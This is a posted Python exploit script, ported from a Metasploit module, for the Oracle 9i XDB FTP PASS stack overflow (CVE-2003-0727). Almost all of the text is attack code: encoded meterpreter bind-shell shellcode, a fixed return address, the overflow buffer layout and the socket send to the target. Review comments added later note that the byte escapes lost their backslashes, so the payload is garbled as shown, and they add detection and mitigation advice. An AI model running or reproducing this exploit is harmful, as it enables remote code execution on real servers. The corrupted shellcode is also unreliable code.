Oracle 9i XDB FTP Pass Overflow
Posted on 03 February 2016
'''
Oracle 9i XDB FTP PASS Overflow (win32)

Ported to python from the Metasploit oracle9i_xdb_ftp_pass.rb exploit
Original exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb

Description from original exploit:
By passing an overly long string to the PASS command, a stack based buffer
overflow occurs. David Litchfield has illustrated multiple vulnerabilities in
the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat conference.
http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf

CVE: 2003-0727
OSVDB: 2449
BID: 8375

Date: 2/2/2016
Ported by: Tom Ryans
Tested on: Win 2000 SP4

Usage: oracle9i_ftp_pass.py target_ip target_port
ex. oracle9i_ftp_pass.py 127.0.0.1 2100

Spawns meterpreter bind shell on port 7000.
'''
# NOTE(review): a shebang is only honoured by the OS when it is the very first
# line of the file; placed after the module docstring it is inert.
#!/usr/bin/python
# Python 2 syntax throughout (print statements, str-based socket sends); the
# listing will not run unmodified on Python 3.
import sys, socket

# Exactly two positional arguments are required: target host and TCP port.
# NOTE(review): sys.exit() with no argument exits with status 0 even on this
# usage error; a non-zero status would be conventional.
if len(sys.argv) != 3:
    print "Usage: %s target_ip target_port" % sys.argv[0]
    sys.exit()

host = str(sys.argv[1])
port = int(sys.argv[2])

# Payload as produced by the msfvenom command below (bind shell on 7000,
# encoded to avoid the listed bad characters).
# NOTE(review): as displayed, these literals hold the ASCII characters
# 'x', 'd', 'b', ... rather than "\x.." byte escapes -- the backslashes were
# presumably lost when the page was extracted, so neither the byte values nor
# the lengths computed from them below correspond to the msfvenom output the
# comment describes. Do not assume this listing is runnable as shown.
#msfvenom -p windows/meterpreter/bind_tcp lport=7000 EXITFUNC=thread -b "x00x09x0ax0dx20x22x25x26x27x2bx2fx3ax3cx3ex3fx40" -f c
shellcode = (
"xdbxc8xd9x74x24xf4x5bx31xc9xb1x4bxbdxe8xe3x74"
"x4ex83xc3x04x31x6bx16x03x6bx16xe2x1dx1fx9cxcc"
"xddxe0x5dxb1x54x05x6cxf1x02x4dxdfxc1x41x03xec"
"xaax07xb0x67xdex8fxb7xc0x55xe9xf6xd1xc6xc9x99"
"x51x15x1dx7ax6bxd6x50x7bxacx0bx98x29x65x47x0e"
"xdex02x1dx92x55x58xb3x92x8ax29xb2xb3x1cx21xed"
"x13x9exe6x85x1axb8xebxa0xd5x33xdfx5fxe4x95x11"
"x9fx4axd8x9dx52x93x1cx19x8dxe6x54x59x30xf0xa2"
"x23xeex75x31x83x65x2dx9dx35xa9xabx56x39x06xb8"
"x31x5ex99x6dx4ax5ax12x90x9dxeax60xb6x39xb6x33"
"xd7x18x12x95xe8x7bxfdx4ax4cxf7x10x9exfdx5ax7d"
"x53xcfx64x7dxfbx58x16x4fxa4xf2xb0xe3x2dxdcx47"
"x03x04x98xd8xfaxa7xd8xf1x38xf3x88x69xe8x7cx43"
"x6ax15xa9xf9x61xb0x02x1fx88x28xa2xb5x71xc5x4e"
"x46xa9xf5x70x8dxc2x9ex8cx2dxf6x06x18xcbx62xa7"
"x4cx44x1bx05xabx5dxbcx76x99x24x82xfcx7ax71x6b"
"x48x93x45x94x49xb1xe2x02xc2xd6x37x32xd5xf2x10"
"x23x42x88xf0x06xf2x8dxd9xf3xf4x1bxe5x55xa2xb3"
"xe7x80x84x1bx18xe7x96x5cxe6x76xb4x17xd0xecx86"
"x4fx1cxe1x06x90x4ax6bx07xf8x2axcfx54x1dx35xda"
"xc8x8exa3xe5xb8x63x64x8ex46x5dx42x11xb8x88xd1"
"x56x46x4dxd2xa7x84x98x1axd2xe3x18"
)

# The USER value is irrelevant to the bug; the overflow is in PASS handling.
user = "A" * 10

# return address from Metasploit module: 0x60616d46 oraclient9.dll (pop/pop/ret)
# NOTE(review): a fixed address inside one DLL build ties this to the tested
# platform (Win 2000 SP4 per the docstring); it is not a generic trigger.
ret = "x46x6dx61x60"
prependencoder = "x81xc4xffxefxffxffx44" #from Metasploit module

# Padding sized so filler + prependencoder + shellcode totals 800 bytes
# (the sizes are only meaningful once the escape issue noted above is resolved).
nops = "x90" * (800 - len(shellcode) - len(prependencoder))

# Overflow buffer: 442 bytes of filler, a 4-byte short-jump stub, the
# pop/pop/ret address, the padding, then the payload. The pop/pop/ret gadget
# plus short-jump prefix suggests a SEH-overwrite layout -- confirm against the
# Metasploit module. Defensive note: the resulting PASS argument is well over
# 1 KB; a PASS command of anything like that length on the XDB FTP listener
# (2100 in the usage example) is a reliable signature for this attack, and
# patching / disabling the XDB FTP service or restricting network access to it
# is the mitigation.
buff = "A" * 442 + "xebx06x90x90" + ret + nops + prependencoder + shellcode

print " ++++++++++++++++++++++++++++++++++++++++++++"
print " + Oracle 9i XDB FTP PASS Overflow exploit +"
print " +++++++++++++++++++++++++++++++++++++++++++++"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# Echo the server banner; nothing checks that it is actually an XDB FTP
# greeting before sending.
print s.recv(1024)
print "Sending %s size payload..." % len(buff)
s.send("USER " + user + " ")
s.send("PASS " + buff + " ")
# No success check is possible from this side: the script simply reports that
# the buffer was sent and that a listener on 7000 should be looked for.
print "Payload sent...."
print "Check port 7000 for meterpreter shell..."
s.close()